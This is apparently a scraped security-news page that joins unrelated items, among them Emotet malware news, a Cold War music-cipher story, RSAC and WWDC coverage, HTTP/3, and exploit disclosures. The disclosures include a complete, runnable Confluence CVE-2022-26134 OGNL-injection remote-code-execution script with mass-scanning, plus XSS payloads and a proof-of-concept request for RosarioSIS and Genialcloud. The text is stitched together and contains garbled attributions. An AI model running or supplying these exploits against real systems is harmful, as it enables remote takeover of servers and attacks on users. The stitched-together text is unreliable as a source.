Image Source: Toptal
The notorious Emotet malware has turned to deploy a new module designed to siphon credit card information stored in the Chrome web browser.
The credit card stealer, which exclusively singles out Chrome, has the ability to exfiltrate the collected information to different remote command-and-control (C2) servers, according to enterprise security company Proofpoint, which

Image Source: Toptal

The notorious Emotet malware has turned to deploy a new module designed to siphon credit card information stored in the Chrome web browser.

The credit card stealer, which exclusively singles out Chrome, has the ability to exfiltrate the collected information to different remote command-and-control (C2) servers, according to enterprise security company Proofpoint, which observed the component on June 6.

The development comes amid a spike in Emotet activity since it was resurrected late last year following a 10-month-long hiatus in the wake of a law enforcement operation that took down its attack infrastructure in January 2021.

Emotet, attributed to a threat actor known as TA542 (aka Mummy Spider or Gold Crestwood), is an advanced, self-propagating and modular trojan that's delivered via email campaigns and is used as a distributor for other payloads such as ransomware.

As of April 2022, Emotet is still the most popular malware with a global impact of 6% of organizations worldwide, followed by Formbook and Agent Tesla, per Check Point, with the malware testing out new delivery methods using OneDrive URLs and PowerShell in .LNK attachments to get around Microsoft's macro restrictions.

The steady growth in Emotet-related threats is substantiated further by the fact that the number of phishing emails, often hijacking already existing correspondence, grew from 3,000 in February 2022 to approximately 30,000 in March targeting organizations in various countries as part of a mass-scale spam campaign.

Stating that Emotet activity have "shifted to a higher gear" in March and April 2022, ESET said that detections jumped a 100-fold, registering a growth of over 11,000% during the first four months of the year when compared to the preceding three-month period from September to December 2021.

Some of the common targets since the botnet's resurrection have been Japan, Italy, and Mexico, the Slovak cybersecurity company noted, adding the biggest wave was recorded on March 16, 2022.

"The size of Emotet's latest LNK and XLL campaigns was significantly smaller than those distributed via compromised DOC files seen in March," Dušan Lacika, senior detection engineer at Dušan Lacika, said.

"This suggests that the operators are only using a fraction of the botnet's potential while testing new distribution vectors that could replace the now disabled-by-default VBA macros."

The findings also come as researchers from CyberArk demonstrated a new technique to extract plaintext credentials directly from memory in Chromium-based web browsers.

"Credential data is stored in Chrome's memory in cleartext format," CyberArk's Zeev Ben Porat said. "In addition to data that is dynamically entered when signing into specific web applications, an attacker can cause the browser to load into memory all the passwords that are stored in the password manager."

This also includes cookie-related information such as session cookies, potentially allowing an attacker to extract the information and use it to hijack users' accounts even when they are protected by multi-factor authentication.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

New Emotet Variant Stealing Users' Credit Card Information from Google Chrome

Using a custom encryption scheme within music notation, Merryl Goldberg and three other US musicians slipped information to Soviet performers and activists known as the Phantom Orchestra.

In 1985, saxophonist Merryl Goldberg found herself on a plane to Moscow with three fellow musicians from the Boston Klezmer Conservatory Band. She had carefully packed sheet music, reeds, and other woodwind supplies, along with a soprano saxophone, to bring into the USSR. But one of her spiral-bound notebooks, lined with staves for hand-notating music, contained hidden information.

Courtesy of Merryl Goldberg

Courtesy of Merryl Goldberg

Using a code she had developed herself, Goldberg had obscured names, addresses, and other details the group would need for their trip in handwritten compositions that looked, to an untrained eye, like the real melodies she’d written on other pages of the book. Goldberg and her colleagues didn’t want to give Soviet officials details of who they planned to see and what they planned to do on their trip. They were going to meet the Phantom Orchestra.

The group was a dissident ensemble that Goldberg describes as an amalgamation of Jewish refuseniks (Jews who were barred from emigrating out of the USSR), Christian activists, and Helsinki monitors—watchdogs who tracked Soviet compliance with the 1975 Helsinki Accords. The Americans’ trip was funded and coordinated by the nonprofit Action for Soviet Jewry (now Action for Post-Soviet Jewry), which works on humanitarian relief in the former Soviet Union and was focused on helping Soviet Jews emigrate to Israel and the United States. 

The trip was a rare and special opportunity for American and Soviet players to meet in the USSR and make music together. It was also an opportunity for the American musicians to smuggle information about aid efforts and plans to the Phantom Orchestra, and for the ensemble to send updates out, including details about individuals looking to escape the Soviet Union.

Courtesy of Merryl Goldberg

Goldberg and her colleagues, all of whom are Jewish, traveled to Moscow separately in two pairs to make it less likely that they would arouse suspicion as a group. They had received training on how to react to questioning and been told to expect surveillance, even run-ins with Soviet officials, throughout their trip. But first Goldberg needed to get her notebook past border control. 

“When we arrived, we were immediately pulled aside, and they went through everything in our luggage, to the point of unwrapping Tampax. It was crazy,” says Goldberg, who is presenting about the experience and her musical code at the RSA security conference in San Francisco today. “With my music, they opened it up and there were some real tunes in there. If you’re not a musician, you wouldn’t know what’s what. They went page by page through everything—and then they handed it back.”

Goldberg says that while the code worked and Soviet officials didn’t confiscate their music, they did interrogate all four travelers about what they planned to do while in the USSR. “We were brought into a room with a big burly guy who banged on the table and yelled at us,” remembers Goldberg, now a music education professor at California State University, San Marcos.

Musical note names span the letters A to G, so they don’t provide a full alphabet of options on their own. To create the code, Goldberg assigned letters of the alphabet to notes in the chromatic scale, a 12-tone scale that includes semi-tones (sharps and flats) to expand the possibilities. In some examples, Goldberg wrote only in one musical range, known as treble clef. In others, she expanded the register to be able to encode more letters and added a bass clef to extend the range of the musical scale. These details and variations also added verisimilitude to her encoded music. 

For numbers, Goldberg would simply write them between the staves, where sometimes you might see chord symbols. She also added other characteristics of composition, like rhythms (half notes, quarter notes, eighth notes, whole notes), key signatures, tempo markings, and articulation indicators like slurs and ties. Most of these were there to make the music look more legitimate, but some doubled as coded supplements to the letters hidden in the music notes. She even occasionally drew tiny diagrams that could be mistaken for charts to remind herself of where a meeting place was located or how to deliver something. 

While someone could technically have played the code as music, it would have sounded less like a tune and more like a cat walking across piano keys.

“I picked a note to start, and then I created the alphabet from there. Once you know it, it ends up being pretty easy to write things. I taught my friends on the trip the code, too,” Goldberg says. “We used it in order to take in people’s addresses and other information we would need to find them. And we coded things while we were there so we would be able to take out some information about people and their efforts to emigrate, as well as details we hoped could help other people ask to leave.”

The US musicians got their bearings in Moscow before heading to Tbilisi, the capital of Georgia. There and on their next stop in Yerevan, the capital of Armenia, they successfully met members of the Phantom Orchestra, many of whom spoke some English, and spent time getting to know each other, playing music together, and even staging small, impromptu concerts.

During eight days of travel, the musicians were tailed constantly by Soviet agents and were repeatedly stopped for questioning. Goldberg says that members of the Phantom Orchestra, all of whom faced similar treatment in their daily lives, gave her and her colleagues advice and encouragement. When the Americans would express concerns that their presence was endangering the activists, Goldberg says the Phantom Orchestra members were resolute about the importance of spending time together. She adds, though, that some of the activists were later arrested and even beaten, because of the interactions.

“On the second night, we were playing together and the KGB came in and everything got shut down. The electricity was turned off; it was a scary situation,” Goldberg says. “And yet, when we’re playing music no one can take away that sense of freedom and empowerment. Playing together and communicating with people through music is like nothing else. I was amazed by the strength it brought the people there. Music can be very comforting, but it also conveys a sense of feeling powerful.”

After their time in Yerevan, the American musicians had planned to go to Riga, the capital of Latvia, and then to Leningrad, now St. Petersburg in Russia. Finally, they were set to stop in Paris before returning to the United States. Instead, they were stopped and questioned again. The musicians were supposed to be placed under house arrest in Yerevan, but Goldberg says that Armenian officials bristled at the KGB intrusion and let them continue their trip. Eventually, though, the musicians were picked up and escorted back to Moscow, where Soviet agents confiscated their passports. Goldberg says the group was driven around Moscow for several hours, perhaps as a scare tactic, before finally being allowed to stay together in a dormitory room guarded by young Soviet men with machine guns.

Courtesy of Merryl Goldberg

“At that point, you’re thinking they’re going to take us to Siberia or something,” she says. “We were super freaked out. So we kept playing music for each other that night. And we played a beloved Russian folk tune, but out of tune, to annoy the young soldier outside our door. It gave us a sense of humor and empowerment.”

Finally, officials said the group would be deported to Sweden. They were heavily guarded and brought to a plane that had come from Sweden and was going to return without passengers. While officials searched their possessions again before letting them on the plane, no one ever flagged the sheet music. Goldberg points out that she even got the film from her camera back, perhaps thanks to a sympathizer.

“They were given no reason for their expulsion, and US officials are still waiting for information from the Soviet Foreign Ministry,” Reuters reported in a wire about the situation on May 31, 1985. “The spokesman said the expulsion appeared to be linked to their meeting with … Georgian dissidents.”

Goldberg says that while she later learned that some of the Soviet activists faced consequences for the visit, some of the people the musicians met on the trip were eventually able to permanently leave the USSR. She notes that while her musical code wouldn’t have been very difficult to crack if someone were focused on it, the obfuscation served its purpose, making it both an elegant and harmonious encryption scheme.

How a Saxophonist Tricked the KGB by Encrypting Secrets in Music

Spirits were high at the return of the in-person contest, which kicked off by bringing last year's virtual event winner on stage.

RSA CONFERENCE 2022 – San Francisco – At the Moscone Center on Monday, RSA Conference program committee chair Hugh Thompson's happiness was palpable. He told a cute story about his kids learning to hack during the COVID-19 lockdown and exulted in holding the Innovation Sandbox competition in person.

"You will not be able to walk out of this place today without being so excited about the kinds of innovation that are happening in security today," Thompson said.

At the in-person 2022 Innovation Sandbox, representatives from 10 cybersecurity startups made their case for having the most innovative technology in the sector. Each finalist had three minutes to pitch their tech to a panel of experienced judges. The judges were Dorit Dor, chief product officer of Check Point Software; Paul Kocher, independent researcher and founder of Cryptography Research (who Thompson called the "Simon Cowell of the judging panel"); Niloo Razi Howe, senior operating partner at Energy Impact Partners; Shlomo Kramer, co-founder and CEO of Cato Networks; and Christopher Young, executive VP of business development, strategy, and ventures at Microsoft.

Thompson brought Dor and Howe to the stage to discuss the judges' deliberations and announce the winner. He tried to gin up some good-natured drama by asking about altercations and pointing out the judges' lack of obvious injuries.

"There was a big dispute," Dor acknowledged, but Howe assured him, "We're not bloodied or bruised."

Both Howe and Dor had high praise for all 10 companies. "There are many good technologies out there, and it was not an easy selection," Dor said.

Added Howe: "There was conversation about every single company. The top 10 are really fantastic, solving really important problems."

First Thompson announced the top two: Talon Cyber Security and BastionZero. Ofer Ben Noon, co-founder and CEO of Talon, and Shannon Goldberg, CEO of BastionZero, shook hands with everyone. Goldberg even hugged Noon.

Dor called Talon's custom browser portal a "legit alternative that brings simplicity and manageability" for organizations with distributed workforces. Howe praised BastionZero for tackling the "really important problem of management of sessions connecting into the infrastructure."

But in the end, there could be only one winner — and it was Talon.

Here's how the presentations went down.

**The 10 Contestants**

The first contestant was Leonid Belkind, CTO of Torq, which Thompson described as "no-code automation for security teams." Belkind ran through his spiel in exactly three minutes "to the second," Thompson marveled.

The first judge question was from Kocher, who asked, "If someone isn't technical enough to write code, how are they going to understand what they're going to screw up with their automation?" Kramer asked about departments that don't want to collaborate with security teams, while Howe pointed out that in the crowded no-code sector, Torq would need to displace an existing contender.

Next up was Ben Noon, whose company's tagline is "solving security for hybrid work and unmanaged devices." He made a compelling case, saying, "Your browser is your front door," and it's been left open. The company built a secure corporate portal in Chromium with a user experience like Google Chrome and a backend that provides visibility and malware protection.

Then Sevco Security co-founder and CEO J.J. Guy presented for his company, "the starting point for all of your security activities." The company's tech aims to make a complete inventory of all devices connected to an organization to improve asset management.

The fourth contestant was Giora Engel, CEO and founder of Neosec, which is "reinventing API security by bringing XDR techniques and true behavioral analytics." His company addresses what he calls "the API blindspot" — B2B APIs, which are overlooked while people address B2C concerns.

Vladi Sandler represented Lightspin, which sells "graph-based cloud security built by and for cloud engineers." Refreshingly, the CEO mentioned 50% female representation on staff as a differentiating factor. Kocher tried to earn his Simon Cowell rep by saying, "So on Amazon's website I had to turn off One-Click ordering because I kept getting the wrong stuff. You claim on your website that in one click, you can remediate problems. Should I be scared by that?" Sandler rejoined that he trusts his team's skills, and Thompson gently ribbed Kocher about his Amazon problem afterward.

David McCaw co-founded Dasera, which is "helping cloud-first organizations operationalize data governance," according to its tagline. "We think DataGovOps is going to be the next revolution and finally solve the data challenges we've been facing for a long time," he asserted.

Cycode, which provides "complete software supply chain security," was represented by CEO and co-founder Lior Levy. Dor dropped a judge's question that brought laughs to the room: "How do you convince developers to fix their code?" Levy responded that his company helps developers implement bug fixes within their existing workflows and adds in automation "so they don't get frustrated."

"Bringing incident response into the cloud era" is Cado Security. CEO and co-founder James Campbell compared the manual process of investigating and responding to cloud incidents to the tedious procedure for creating a mix tape (Gen X represent).

"Is data collection happening before an attack or after an attack?" Kramer asked. "Is it part of the investigation, or is it part of the ongoing process?" The answer was that it depends on which services a customer uses.

Goldberg showed up to talk about her company BastionZero, which says it is "redefining zero trust for access to cloud infrastructure." Thompson asked Kocher, who co-created the SSL protocol, to ask a question. He obliged by asking whether organizations should use BastionZero or the strong encryption of a YubiKey to replace passwords.

Goldberg answered, "You should use us, for sure, absolutely," which again brought laughs, but she continued by saying that the separate authentication path could include things like YubiKeys.

Araali Networks, whose tagline was "surviving intrusions in cloud-native environments," closed out the contest with co-founder and CEO Abhishek Singh. The judges asked several technical questions about how the system handles various situations and configurations, which Singh handled ably.

"It works out of the box for Google, Amazon, and Azure," he assured Microsoft's Young. "Any system that works with Linux ... is ready to work with us."

**In-Person Do-Over for Apiiro**

    

Source: Screen-grab from RSA Conference

One of the most poignant moments came at the beginning of the show: Thompson brought up the winner of the 2021 Innovation Sandbox, which was held virtually, so that he could have his in-person moment of glory. Idan Plotnik, co-founder of Apiiro, shook Thompson's hand and told him his company had increased its revenue by 398% in the past year.

"Everything changed," Plotnik said.  

The 10 finalists, in alphabetical order, were:

1.  Araali Networks
2.  BastionZero
3.  Cado Security
4.  Cycode
5.  Dasera
6.  Lightspin
7.  Neosec
8.  Sevco Security
9.  Talon Cyber Security
10.  Torq

For more about each of these companies, read our contest preview.

Talon Grasps Victory at a Jubilant RSAC Innovation Sandbox

Cross-site Scripting (XSS) - Stored in GitHub repository francoisjacquet/rosariosis prior to 9.0.

**Description**

Website does incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. This fix for this bug https://huntr.dev/bounties/dcf87c0b-6188-4817-8798-ef1e2581b15a/ can be bypassed using bellow payload

    jAvAsCrIpT:alert(origin)
    

**Steps to reproduce \[it works on Firefox (not in chromium based browsers)\]**

1.Go to https://www.rosariosis.org/demonstration/ and login with administrator account

2.Go to https://www.rosariosis.org/demonstration/Modules.php?modname=Resources/Resources.php

3.Create new link with content jAvAsCrIpT:alert(origin)

4.Click the link and observe a pop up

**Image POC**

https://drive.google.com/file/d/11F1mjqytYIgmMVtOEC4EbOHhvVi0pEPh/view?usp=sharing

https://drive.google.com/file/d/1dGPRWE6KRf2bfOezRblbWtHAwM1P29iL/view?usp=sharing

**Impact**

User clicking the link can be affected by malicious javascript code created by the attacker.

CVE-2022-1997: Bypass filter - Stored XSS in Resources  in rosariosis

Passkeys, Safety Check, and Private Access Tokens demonstrated during week-long virtual conference

Passkeys, Safety Check, and Private Access Tokens demonstrated during week-long virtual conference

The 2022 edition of Apple’s Worldwide Developers Conference (WWDC) kicked off this week, with numerous security and privacy developments placed front and center among the firm’s mobile and desktop platforms.

As has become tradition, this year’s WWDC offered a glimpse into Apple’s product and feature pipeline for the coming months.

On Monday (June 6), attendees were given a first look at the redesigned MacBook Air and the updated 13-inch MacBook Pro powered by the M2 chip, along with new features coming to iOS 16, iPadOS 16, macOS Ventura, and watchOS 9.

**What’s new in Safari?**

Apple’s Safari browser – which is now thought to have overtaken Chrome as the most popular mobile browser in North America – will soon include several security and privacy enhancements designed to help protect users and open up new opportunities for developers.

“With both of the new Cross Origin Opener Policy and Cross Origin Embedder Policy HTTP response headers, your site can opt in to process isolation, which means your site will run in its own dedicated webContent process,” said Kendall Bagley, software engineer on the Safari team.

**DON’T MISS** HTTP/3 evolves into RFC 9114 – a security advantage, but not without challenges

“Our second security enhancement also involves HTTP headers, with our improved support for Content Security Policy Level 3. CSP provides enhanced security control over your loading content and mitigates risk of cross-site scripting \[XSS\] and other vulnerabilities.”

Check out the Safari 16 beta release notes for more information.

WWDC22 attendees watch the unveiling of iOS 16

**Introducing Passkeys**

Garrett Davidson of Apple’s authentication experience team took to the virtual stage at WWDC22 to showcase Passkeys, the company’s “next-generation authentication technology”.

“Passwords are really hard to use securely,” Davidson explained. “All of us know we’re supposed to create strong, unique passwords for every account, but not many people actually do.”

He added: “As you’re designing your apps and websites, there’s this constant trade-off between keeping accounts secure and designing a good experience. And even if your apps and websites do everything right, issues like phishing and password reuse can still lead to account compromise.”

Read more of the latest Apple security news

To tackle this, Passkeys – which will come bundled with the upcoming macOS Ventura and iOS 16 – creates a unique, cryptographically strong key pair for user accounts and stores it in iCloud Keychain so it syncs and works across all devices.

Once the pairing has been created, any future visit to the app or website sign-in form will show the ‘Passkey’ option in the QuickType bar. The user simply needs to tap the option, or use Touch ID, and they are signed in.

Davidson said: “With Passkeys, not only is the user experience better than a password, but also entire categories of security problems, like weak and reused credentials, credential leaks, and phishing, are just not possible anymore. And they are so easy to use.”

Visit Apple’s technical documentation page for implementation information.

**Safety Check**

Also new for Apple devices this year is a new privacy tool called Safety Check, which aims to help users whose personal safety might be at risk from domestic or intimate partner violence.

Designed to allow users to quickly remove all device access that may have granted to others, Safety Check includes an emergency reset that helps users easily sign out of iCloud on all their other devices, reset privacy permissions, and limit messaging to just the device in their hand.

The service also helps users understand and manage which people and apps they’ve given access to.

**Replacing CAPTCHAs**

That’s not all from WWDC22, as two additional privacy and security tools are due to be showcased later this week.

On Wednesday (June 8), the Apple team will demonstrate Private Access Tokens. This new technology is being marketed as a “powerful alternative” to CAPTCHA challenges that help the identification of HTTP requests from legitimate devices without compromising users’ identity.

“We’ll show you how your app and server can take advantage of this tool to add confidence to your online transactions and preserve privacy,” Apple said.

**YOU MIGHT ALSO LIKE** Popular websites leaking user email data to web tracking domains

Lastly, June 10 will see Apple showcase the latest ways to ensure that DNS – the foundation of internet addressing – is secure within an application.

“Learn how to authenticate DNS responses in your app with DNSSEC and enable DNS encryption automatically with Discovery of Designated Resolvers (DDR),” Apple said in its presentation teaser this week.

WWDC22 continues through June 10. Check out the complete list of sessions for further information.

**READ MORE** Google showers top cloud security researchers with kudos and cash

WWDC 2022: Apple showcases next-gen security tech at annual developer event

Confluence suffers from a pre-authentication remote code execution vulnerability that is leveraged via OGNL injection. All 7.4.17 versions before 7.18.1 are affected.

    #!/usr/bin/python3# Exploit Title: Confluence Pre-Auth Remote Code Execution via OGNL Injection# Google Dork: N/A# Date: 06/006/2022# Exploit Author: h3v0x# Vendor Homepage: https://www.atlassian.com/# Software Link: https://www.atlassian.com/software/confluence/download-archives# Version: All < 7.4.17 versions before 7.18.1# Tested on: -# CVE : CVE-2022-26134# https://github.com/h3v0x/CVE-2022-26134import sysimport requestsimport optparseimport multiprocessingfrom requests.packages import urllib3from requests.exceptions import MissingSchema, InvalidURLurllib3.disable_warnings()requestEngine = multiprocessing.Manager()session = requests.Session()global paramResultsparamResults = requestEngine.list()globals().update(locals())def spiderXpl(url):    globals().update(locals())    if not url.startswith('http'):        url='http://'+url        headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36",               "Connection": "close",               "Accept-Encoding": "gzip, deflate"}    try:        response = requests.get(url + '/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22'+optionsOpt.command+'%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/', headers=headers, verify=False, allow_redirects=False)        if(response.status_code == 302):            print('Found: '+url+' // '+ response.headers['X-Cmd-Response'])            inputBuffer = str(response.headers['X-Cmd-Response'])            paramResults.append('Vulnerable application found:'+url+'\n''Command result:'+inputBuffer+'\n')        else:            pass    except requests.exceptions.ConnectionError:        print('[x] Failed to Connect: '+url)        pass    except multiprocessing.log_to_stderr:        pass    except KeyboardInterrupt:        print('[!] Stoping exploit...')        exit(0)    except (MissingSchema, InvalidURL):        pass        def banner():    print('[-] CVE-2022-26134')    print('[-] Confluence Pre-Auth Remote Code Execution via OGNL Injection \n')    def main():    banner()        globals().update(locals())        sys.setrecursionlimit(100000)    if not optionsOpt.filehosts:        url = optionsOpt.url        spiderXpl(url)    else:        f = open(optionsOpt.filehosts)        urls = map(str.strip, f.readlines())        multiReq = multiprocessing.Pool(optionsOpt.threads_set)        try:            multiReq.map(spiderXpl, urls)            multiReq.close()            multiReq.join()        except UnboundLocalError:            pass        except KeyboardInterrupt:            exit(0)    if optionsOpt.output:        print("\n[!] Saving the output result in: %s" % optionsOpt.output)        with open(optionsOpt.output, "w") as f:            for result in paramResults:                f.write("%s\n" % result)        f.close()if __name__ == "__main__":    parser = optparse.OptionParser()    parser.add_option('-u', '--url', action="store", dest="url", help='Base target uri (ex. http://target-uri/)')    parser.add_option('-f', '--file', dest="filehosts", help='example.txt')    parser.add_option('-t', '--threads', dest="threads_set", type=int,default=10)    parser.add_option('-m', '--maxtimeout', dest="timeout", type=int,default=8)    parser.add_option('-o', '--output', dest="output", type=str, default='exploit_result.txt')    parser.add_option('-c', '--cmd', dest="command", type=str, default='id')    optionsOpt, args = parser.parse_args()    main()

Confluence OGNL Injection Remote Code Execution

The backbone of the web has received a major upgrade

The backbone of the web has received a major upgrade

ANALYSIS The HTTP/3 protocol has received RFC 9114 standardization – a boost for internet security, but not one without hurdles for web developers.

This week, the Internet Engineering Task Force (IETF) released HTTP/3, published as RFC 9114.

The HTTP protocol is the backbone of the web. The Hypertext Transfer Protocol (HTTP) acts as an application layer for facilitating communication between servers and browsers, fetching resources, and transferring data. HTTPS is HTTP with additional security via encryption.

**BACKGROUND** HTTP/3: Everything you need to know about the next-generation web protocol

HTTP/3 is the latest revision of the HTTP protocol, taking over from 2015’s HTTP/2. HTTP/3 is designed to address some of the performance issues inherent in HTTP/2, improving the user experience, decreasing the impact of packet loss without head-of-line blocking, speeding up handshake requirements, and enabling encryption by default.

The protocol utilizes space congestion control over User Datagram Protocol (UDP).

**QUIC step**

One of the major differences in HTTP/3 is QUIC. Developed by Google, Quick UDP Internet Connections (QUIC) was adopted by the IETF, and a tailored version provides a cornerstone of HTTP/3.

As noted by Cloudflare, implementing QUIC sets up encrypted connections by default at the transport layer, combining handshakes into one action and encrypting the metadata exchanged between connections.

Read more of the latest secure development news

Packet numbers and header information is, therefore, removed from eavesdroppers and attackers. This improvement might potentially lower the success of manipulator-in-the-middle (MitM) attacks, IP spoofing, and denial-of-service assaults.

“This feature was not included in HTTP/2,” Cloudflare notes. “Encrypting this data helps keep actionable information about user behavior out of attackers’ hands.”

Encryption at the transport layer isn’t the end of the story. Akamai says that as HTTP/3 runs on QUIC, this also paves the way for future innovations in encrypted transport and communication – as we’ve already seen with the QUIC Datagram extension (RFC 9221), a technology to manage both UDP and TCP traffic securely.

Furthermore, the protocol supports zero round-trip time (0-RTT), introduced in TLS 1.3, which skips the handshake requirement in trusted settings – but a downside is that this could lead to replay attacks without adequate protection.

**‘Challenging prospect’**

Rustam Lalkaka, director of product at Cloudflare, previously told us that while HTTP/3 has a range of security and performance benefits, enabling QUIC can be a challenging prospect for developers as many widely-sed technologies are yet to add QUIC and HTTP/3 support.

Some transit providers and ISPs may be hostile to UDP traffic, and there may also be a need for increased CPU usage when HTTP/3 is implemented, a detriment to both servers and web browsers.

Support for HTTP/3 has been rolled out gradually across major browsers including Google Chrome, Mozilla Firefox, and Microsoft Edge. Apple Safari also provides support, although at the time of writing, this must be enabled in the ‘Experimental Features’ tab in the developer menu.

Cloudflare scans have revealed that the majority of online traffic is facilitated by HTTP/2. The majority of current HTTP/3 requests are made by Chrome users, followed by Edge and Firefox. Safari volumes are minimal, but Cloudflare expects an uptick once Apple enables HTTP/3 support by default.

Cloudflare Radar estimates that 8% of internet traffic is HTTP/1-based, followed by HTTP/2 at 67%, and HTTP/3 at 25%.

**YOU MIGHT ALSO LIKE** Dozens of high-traffic websites vulnerable to ‘account pre-hijacking’, study finds

HTTP/3 evolves into RFC 9114 – a security advantage, but not without challenges

A reflected cross-site scripting (XSS) vulnerability in the login portal of Avantune Genialcloud ProJ - 10 allows attackers to execute arbitrary web scripts or HTML via a crafted payload.

\# Exploit Title: Avantune Genialcloud ProJ 10 - Reflected XSS (Cross-Site Scripting) # Date: 2022-06-01 # Exploit Author: Andrea Intilangelo # Vendor Homepage: https://www.avantune.com # Software Link: https://www.genialcloud.com - https://www.genialcloud.com/discover-genialcloud-proj - https://store.genialcloud.com # Version: 10 # Tested on: Latest Version of Desktop Web Browsers (ATTOW: Firefox 100.0, Microsoft Edge 101.0.1210.39) # CVE: CVE-2022-29296 Reflected Cross-Site Scripting (XSS) vulnerability in login-portal webpage of Genialcloud ProJ (and potentially in other platforms from the same software house "Avantune" since codebase seems shared with their other products: Facsys and Analysis) allows remote attacker to inject and execute arbitrary web scripts or HTML via a crafted payload. Request parameters affected is "msg". PoC Request: GET /eportal/?nologon=1&msg=Invalid%20username%20or%20password%27%3Balert%28%22y0%21+XSS+here+%3A%29%22%29%2F%2F HTTP/1.1 Host: \[REDACTED\] Cookie: ASP.NET\_SessionId=3recnmmlpo1glzzyejdoezk2 Upgrade-Insecure-Requests: 1 Accept-Encoding: gzip, deflate Accept: \*/\* Accept-Language: en-US,en-GB;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36 Connection: close Cache-Control: max-age=0 PoC Response: HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/10.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Date: Wed, 11 May 2022 10:51:10 GMT Connection: close Content-Length: 8162 var Msg = 'Invalid username or password';alert("y0! XSS here :)")//'; ...\[SNIP\]... Timeline: 2022-01-05: Vulnerability discovered. 2022-01-06: Vendor contacted. 2022-02-07: No reply, vendor contacted for 2nd time. 2022-02-10: Request for CVE reservation. 2022-04-16: Assigned CVE number CVE-2022-29296. 2022-05-07: No reply, vendor contacted for 3rd time. 2022-06-01: Public disclosure. PoC Screenshots: https://imagebin.ca/v/6j86ekMqKZD8 https://postimg.cc/XXv6YbK9

CVE-2022-29296

A Denial of Service flaw was discovered in Elasticsearch. Using this vulnerability, an unauthenticated attacker could forcibly shut down an Elasticsearch node with a specifically formatted network request.

Tag

#chrome